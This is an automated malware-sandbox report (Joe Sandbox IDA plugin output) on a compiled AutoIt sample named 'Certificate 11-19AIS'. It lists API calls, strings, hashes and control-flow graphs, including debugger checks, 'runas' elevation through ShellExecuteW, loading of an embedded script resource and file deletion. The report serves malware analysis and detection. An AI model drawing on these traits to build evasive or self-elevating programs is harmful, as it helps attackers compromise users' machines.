                                                                              • Opcode ID: 38efee3ae7810dbb8eace232f8ed2d61c987908e249679c51965c43f5d0eba68
                                                                              • Instruction ID: e1a0642301057b1e55cbcc00464c4903eec3743c0e1c269a911fa8f213795359
                                                                              • Opcode Fuzzy Hash: 38efee3ae7810dbb8eace232f8ed2d61c987908e249679c51965c43f5d0eba68
                                                                              • Instruction Fuzzy Hash: 40325A75A02269CBCB24CF54DC856E9B7B5FB4A310F5940DAE40AE7B81D7389E80CF52
                                                                              Function 007B3D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,007B3AA3,?), ref: 007B3D45
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,007B3AA3,?), ref: 007B3D57
                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00871148,00871130,?,?,?,?,007B3AA3,?), ref: 007B3DC8
                                                                                • Part of subcall function 007B6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,007B3DEE,00871148,?,?,?,?,?,007B3AA3,?), ref: 007B6471
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,007B3AA3,?), ref: 007B3E48
                                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008628F4,00000010), ref: 00821CCE
                                                                              • SetCurrentDirectoryW.KERNEL32(?,00871148,?,?,?,?,?,007B3AA3,?), ref: 00821D06
                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0084DAB4,00871148,?,?,?,?,?,007B3AA3,?), ref: 00821D89
                                                                              • ShellExecuteW.SHELL32(00000000,?,?,?,?,007B3AA3), ref: 00821D90
                                                                                • Part of subcall function 007B3E6E: GetSysColorBrush.USER32(0000000F), ref: 007B3E79
                                                                                • Part of subcall function 007B3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 007B3E88
                                                                                • Part of subcall function 007B3E6E: LoadIconW.USER32(00000063), ref: 007B3E9E
                                                                                • Part of subcall function 007B3E6E: LoadIconW.USER32(000000A4), ref: 007B3EB0
                                                                                • Part of subcall function 007B3E6E: LoadIconW.USER32(000000A2), ref: 007B3EC2
                                                                                • Part of subcall function 007B3E6E: RegisterClassExW.USER32(?), ref: 007B3F30
                                                                                • Part of subcall function 007B36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007B36E6
                                                                                • Part of subcall function 007B36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B3707
                                                                                • Part of subcall function 007B36B8: ShowWindow.USER32(00000000,?,?,?,?,007B3AA3,?), ref: 007B371B
                                                                                • Part of subcall function 007B36B8: ShowWindow.USER32(00000000,?,?,?,?,007B3AA3,?), ref: 007B3724
                                                                                • Part of subcall function 007B4FFC: _memset.LIBCMT ref: 007B5022
                                                                                • Part of subcall function 007B4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007B50CB
                                                                              Strings
                                                                              • This is a third-party compiled AutoIt script., xrefs: 00821CC8
                                                                              • runas, xrefs: 00821D84
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                                                              • API String ID: 438480954-3287110873
                                                                              • Opcode ID: ca6984b8538bdc02f9c9247cdc6a6cb3a00f3f2b7bd5c10461b06185c892da97
                                                                              • Instruction ID: 6c9366069256f638b56c6c48375467b773617620f852f76baf183bc6494ac2f6
                                                                              • Opcode Fuzzy Hash: ca6984b8538bdc02f9c9247cdc6a6cb3a00f3f2b7bd5c10461b06185c892da97
                                                                              • Instruction Fuzzy Hash: A151F530A04248EACF11ABB8EC4EFED7B75FB55740F008065F615A6296DA7CDA85CB31
                                                                              Function 007CDDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1141 7cddc0-7cde4f call 7bd7f7 GetVersionExW call 7b6a63 call 7cdfb4 call 7b6571 1150 7cde55-7cde56 1141->1150 1151 8224c8-8224cb 1141->1151 1152 7cde58-7cde63 1150->1152 1153 7cde92-7cdea2 call 7cdf77 1150->1153 1154 8224e4-8224e8 1151->1154 1155 8224cd 1151->1155 1156 7cde69-7cde6b 1152->1156 1157 82244e-822454 1152->1157 1172 7cdea4-7cdec1 GetCurrentProcess call 7cdf5f 1153->1172 1173 7cdec7-7cdee1 1153->1173 1160 8224d3-8224dc 1154->1160 1161 8224ea-8224f3 1154->1161 1159 8224d0 1155->1159 1163 822469-822475 1156->1163 1164 7cde71-7cde74 1156->1164 1166 822456-822459 1157->1166 1167 82245e-822464 1157->1167 1159->1160 1160->1154 1161->1159 1162 8224f5-8224f8 1161->1162 1162->1160 1168 822477-82247a 1163->1168 1169 82247f-822485 1163->1169 1170 7cde7a-7cde89 1164->1170 1171 822495-822498 1164->1171 1166->1153 1167->1153 1168->1153 1169->1153 1176 7cde8f 1170->1176 1177 82248a-822490 1170->1177 1171->1153 1178 82249e-8224b3 1171->1178 1172->1173 1193 7cdec3 1172->1193 1174 7cdf31-7cdf3b GetSystemInfo 1173->1174 1175 7cdee3-7cdef7 call 7ce00c 1173->1175 1184 7cdf0e-7cdf1a 1174->1184 1188 7cdf29-7cdf2f GetSystemInfo 1175->1188 1189 7cdef9-7cdf01 call 7cdff4 GetNativeSystemInfo 1175->1189 1176->1153 1177->1153 1181 8224b5-8224b8 1178->1181 1182 8224bd-8224c3 1178->1182 1181->1153 1182->1153 1186 7cdf1c-7cdf1f FreeLibrary 1184->1186 1187 7cdf21-7cdf26 1184->1187 1186->1187 1192 7cdf03-7cdf07 1188->1192 1189->1192 1192->1184 1195 7cdf09-7cdf0c FreeLibrary 1192->1195 1193->1173 1195->1184
                                                                              APIs
                                                                              • GetVersionExW.KERNEL32(?), ref: 007CDDEC
                                                                              • GetCurrentProcess.KERNEL32(00000000,0084DC38,?,?), ref: 007CDEAC
                                                                              • GetNativeSystemInfo.KERNELBASE(?,0084DC38,?,?), ref: 007CDF01
                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 007CDF0C
                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 007CDF1F
                                                                              • GetSystemInfo.KERNEL32(?,0084DC38,?,?), ref: 007CDF29
                                                                              • GetSystemInfo.KERNEL32(?,0084DC38,?,?), ref: 007CDF35
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                              • String ID:
                                                                              • API String ID: 3851250370-0
                                                                              • Opcode ID: b71a3f6c5c06655b0a72d2a9c5c6b7ae8f08131195f4c31db96c5df860bf6c6a
                                                                              • Instruction ID: 35a5663f624190e910d547bb1768956a892e0dc54da64677a07a81c7333622e2
                                                                              • Opcode Fuzzy Hash: b71a3f6c5c06655b0a72d2a9c5c6b7ae8f08131195f4c31db96c5df860bf6c6a
                                                                              • Instruction Fuzzy Hash: 8A61B47180A394DBCF25DF6894C06ED7FB4BF29300B1989EDD8459F207D628C948CB65
                                                                              Function 007B406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1213 7b406b-7b4083 CreateStreamOnHGlobal 1214 7b40a3-7b40a6 1213->1214 1215 7b4085-7b409c FindResourceExW 1213->1215 1216 824f16-824f25 LoadResource 1215->1216 1217 7b40a2 1215->1217 1216->1217 1218 824f2b-824f39 SizeofResource 1216->1218 1217->1214 1218->1217 1219 824f3f-824f4a LockResource 1218->1219 1219->1217 1220 824f50-824f6e 1219->1220 1220->1217
                                                                              APIs
                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,007B449E,?,?,00000000,00000001), ref: 007B407B
                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007B449E,?,?,00000000,00000001), ref: 007B4092
                                                                              • LoadResource.KERNEL32(?,00000000,?,?,007B449E,?,?,00000000,00000001,?,?,?,?,?,?,007B41FB), ref: 00824F1A
                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,007B449E,?,?,00000000,00000001,?,?,?,?,?,?,007B41FB), ref: 00824F2F
                                                                              • LockResource.KERNEL32(007B449E,?,?,007B449E,?,?,00000000,00000001,?,?,?,?,?,?,007B41FB,00000000), ref: 00824F42
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                              • String ID: SCRIPT
                                                                              • API String ID: 3051347437-3967369404
                                                                              • Opcode ID: da21779078d7d45d6815d1443849b9e42e9075f43c348c7c50b54f33580e51e0
                                                                              • Instruction ID: 6025d747bb8d8d96031e04f11fb247298875d28fb33d9abd7aece3a360e0e379
                                                                              • Opcode Fuzzy Hash: da21779078d7d45d6815d1443849b9e42e9075f43c348c7c50b54f33580e51e0
                                                                              • Instruction Fuzzy Hash: B3112A71200701AFE7219B65EC49F677BB9FBC5B51F10456CF612962A0DB71EC008A31
                                                                              Function 007F6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,00822F49), ref: 007F6CB9
                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 007F6CCA
                                                                              • FindClose.KERNEL32(00000000), ref: 007F6CDA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                              • String ID:
                                                                              • API String ID: 48322524-0
                                                                              • Opcode ID: bf199d7d4e9179a52c52caee7d7915f9e4cdc67edb7c591bdbf0819d1f2a5591
                                                                              • Instruction ID: e610d76839e3f1bfc216934eb2d107eda5e88145754883482bb18b7cc4b415db
                                                                              • Opcode Fuzzy Hash: bf199d7d4e9179a52c52caee7d7915f9e4cdc67edb7c591bdbf0819d1f2a5591
                                                                              • Instruction Fuzzy Hash: 7DE0D8358145155782106738FC0D4FD776CEA45339F100B06F6B1C22D0E774E90096E6
                                                                              Function 007C3B70 Relevance: 3.4, Strings: 2, Instructions: 903COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Exception@8Throwstd::exception::exception
                                                                              • String ID: @$P
                                                                              • API String ID: 3728558374-213525895
                                                                              • Opcode ID: d78df3b3ef054b1d35f0738aa0daa3712e54ab4029a53870bc999966c5a2badb
                                                                              • Instruction ID: 0aa561ae43839961a5999f422eb9520b13f3844305c7abc03685768a3ec962a1
                                                                              • Opcode Fuzzy Hash: d78df3b3ef054b1d35f0738aa0daa3712e54ab4029a53870bc999966c5a2badb
                                                                              • Instruction Fuzzy Hash: 83727C71A04219DBCB24DF94C495FAEB7B5FF48300F14C05EE90AAB251D739AE85CB91
                                                                              Function 007C3200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: P
                                                                              • API String ID: 3964851224-3564208636
                                                                              • Opcode ID: 60230137cd4f0cfcdb5bf90131763272d4847810ca8a8c9b784f404f940e0e47
                                                                              • Instruction ID: 4e8b679923c8381c50437ea57e73e369b8910adc44f952895a3a801e7ac76500
                                                                              • Opcode Fuzzy Hash: 60230137cd4f0cfcdb5bf90131763272d4847810ca8a8c9b784f404f940e0e47
                                                                              • Instruction Fuzzy Hash: 37922670608241DFD724DF18C484F6ABBE1FF88304F14895DE99A8B262D779ED85CB92
                                                                              Function 007BE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007BE959
                                                                              • timeGetTime.WINMM ref: 007BEBFA
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007BED2E
                                                                              • TranslateMessage.USER32(?), ref: 007BED3F
                                                                              • DispatchMessageW.USER32(?), ref: 007BED4A
                                                                              • LockWindowUpdate.USER32(00000000), ref: 007BED79
                                                                              • DestroyWindow.USER32 ref: 007BED85
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007BED9F
                                                                              • Sleep.KERNEL32(0000000A), ref: 00825270
                                                                              • TranslateMessage.USER32(?), ref: 008259F7
                                                                              • DispatchMessageW.USER32(?), ref: 00825A05
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00825A19
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                              • API String ID: 2641332412-570651680
                                                                              • Opcode ID: 65fd991f63fa37f60351987e7a7061e46bf3d1346a213e8bb84b204edd924aec
                                                                              • Instruction ID: 2422aa079d91d5d06242f1e0f376cdca6daf571086ff6d407f86dd639926cb9d
                                                                              • Opcode Fuzzy Hash: 65fd991f63fa37f60351987e7a7061e46bf3d1346a213e8bb84b204edd924aec
                                                                              • Instruction Fuzzy Hash: 71627070544350DFDB24DF24D889BEA77E4FB44304F14496DF98A8B292DB79E888CB62
                                                                              Function 007E5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___createFile.LIBCMT ref: 007E5EC3
                                                                              • ___createFile.LIBCMT ref: 007E5F04
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 007E5F2D
                                                                              • __dosmaperr.LIBCMT ref: 007E5F34
                                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 007E5F47
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 007E5F6A
                                                                              • __dosmaperr.LIBCMT ref: 007E5F73
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007E5F7C
                                                                              • __set_osfhnd.LIBCMT ref: 007E5FAC
                                                                              • __lseeki64_nolock.LIBCMT ref: 007E6016
                                                                              • __close_nolock.LIBCMT ref: 007E603C
                                                                              • __chsize_nolock.LIBCMT ref: 007E606C
                                                                              • __lseeki64_nolock.LIBCMT ref: 007E607E
                                                                              • __lseeki64_nolock.LIBCMT ref: 007E6176
                                                                              • __lseeki64_nolock.LIBCMT ref: 007E618B
                                                                              • __close_nolock.LIBCMT ref: 007E61EB
                                                                                • Part of subcall function 007DEA9C: CloseHandle.KERNELBASE(00000000,0085EEF4,00000000,?,007E6041,0085EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 007DEAEC
                                                                                • Part of subcall function 007DEA9C: GetLastError.KERNEL32(?,007E6041,0085EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 007DEAF6
                                                                                • Part of subcall function 007DEA9C: __free_osfhnd.LIBCMT ref: 007DEB03
                                                                                • Part of subcall function 007DEA9C: __dosmaperr.LIBCMT ref: 007DEB25
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              • __lseeki64_nolock.LIBCMT ref: 007E620D
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 007E6342
                                                                              • ___createFile.LIBCMT ref: 007E6361
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 007E636E
                                                                              • __dosmaperr.LIBCMT ref: 007E6375
                                                                              • __free_osfhnd.LIBCMT ref: 007E6395
                                                                              • __invoke_watson.LIBCMT ref: 007E63C3
                                                                              • __wsopen_helper.LIBCMT ref: 007E63DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                              • String ID: @
                                                                              • API String ID: 3896587723-2766056989
                                                                              • Opcode ID: 0bf3517af06c98b46ba420a212ac7faca9bd2794a8706ff0392a4ddc471aabe4
                                                                              • Instruction ID: dc7267b31baab26e630fecd738297469d5f755df5abc678b776d46b2a8d926c0
                                                                              • Opcode Fuzzy Hash: 0bf3517af06c98b46ba420a212ac7faca9bd2794a8706ff0392a4ddc471aabe4
                                                                              • Instruction Fuzzy Hash: A0226971A026899FEF299F69CC89BBD7B31FB18368F244229E5119B2D1D33D8D40C751
                                                                              Function 007FFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • _wcscpy.LIBCMT ref: 007FFA96
                                                                              • _wcschr.LIBCMT ref: 007FFAA4
                                                                              • _wcscpy.LIBCMT ref: 007FFABB
                                                                              • _wcscat.LIBCMT ref: 007FFACA
                                                                              • _wcscat.LIBCMT ref: 007FFAE8
                                                                              • _wcscpy.LIBCMT ref: 007FFB09
                                                                              • __wsplitpath.LIBCMT ref: 007FFBE6
                                                                              • _wcscpy.LIBCMT ref: 007FFC0B
                                                                              • _wcscpy.LIBCMT ref: 007FFC1D
                                                                              • _wcscpy.LIBCMT ref: 007FFC32
                                                                              • _wcscat.LIBCMT ref: 007FFC47
                                                                              • _wcscat.LIBCMT ref: 007FFC59
                                                                              • _wcscat.LIBCMT ref: 007FFC6E
                                                                                • Part of subcall function 007FBFA4: _wcscmp.LIBCMT ref: 007FC03E
                                                                                • Part of subcall function 007FBFA4: __wsplitpath.LIBCMT ref: 007FC083
                                                                                • Part of subcall function 007FBFA4: _wcscpy.LIBCMT ref: 007FC096
                                                                                • Part of subcall function 007FBFA4: _wcscat.LIBCMT ref: 007FC0A9
                                                                                • Part of subcall function 007FBFA4: __wsplitpath.LIBCMT ref: 007FC0CE
                                                                                • Part of subcall function 007FBFA4: _wcscat.LIBCMT ref: 007FC0E4
                                                                                • Part of subcall function 007FBFA4: _wcscat.LIBCMT ref: 007FC0F7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                                              • API String ID: 2955681530-2806939583
                                                                              • Opcode ID: 8b1b45626a92803c1f600d28b4c866e27fc384df794c88ec74ad20d8539f3446
                                                                              • Instruction ID: e872f852aa8455b82dcc29ce04eecb2b0fa04a7ea96f79bdebecc1fa59115764
                                                                              • Opcode Fuzzy Hash: 8b1b45626a92803c1f600d28b4c866e27fc384df794c88ec74ad20d8539f3446
                                                                              • Instruction Fuzzy Hash: 1591A271504309EFDB20EB64C855FAAB3E9BF54310F044869FA5997392DF38E944CB92
                                                                              Function 007FBFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 007FBDB4: __time64.LIBCMT ref: 007FBDBE
                                                                                • Part of subcall function 007B4517: _fseek.LIBCMT ref: 007B452F
                                                                              • __wsplitpath.LIBCMT ref: 007FC083
                                                                                • Part of subcall function 007D1DFC: __wsplitpath_helper.LIBCMT ref: 007D1E3C
                                                                              • _wcscpy.LIBCMT ref: 007FC096
                                                                              • _wcscat.LIBCMT ref: 007FC0A9
                                                                              • __wsplitpath.LIBCMT ref: 007FC0CE
                                                                              • _wcscat.LIBCMT ref: 007FC0E4
                                                                              • _wcscat.LIBCMT ref: 007FC0F7
                                                                              • _wcscmp.LIBCMT ref: 007FC03E
                                                                                • Part of subcall function 007FC56D: _wcscmp.LIBCMT ref: 007FC65D
                                                                                • Part of subcall function 007FC56D: _wcscmp.LIBCMT ref: 007FC670
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007FC2A1
                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007FC338
                                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007FC34E
                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007FC35F
                                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007FC371
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                              • String ID: p1ou`Kpu
                                                                              • API String ID: 2378138488-1196383048
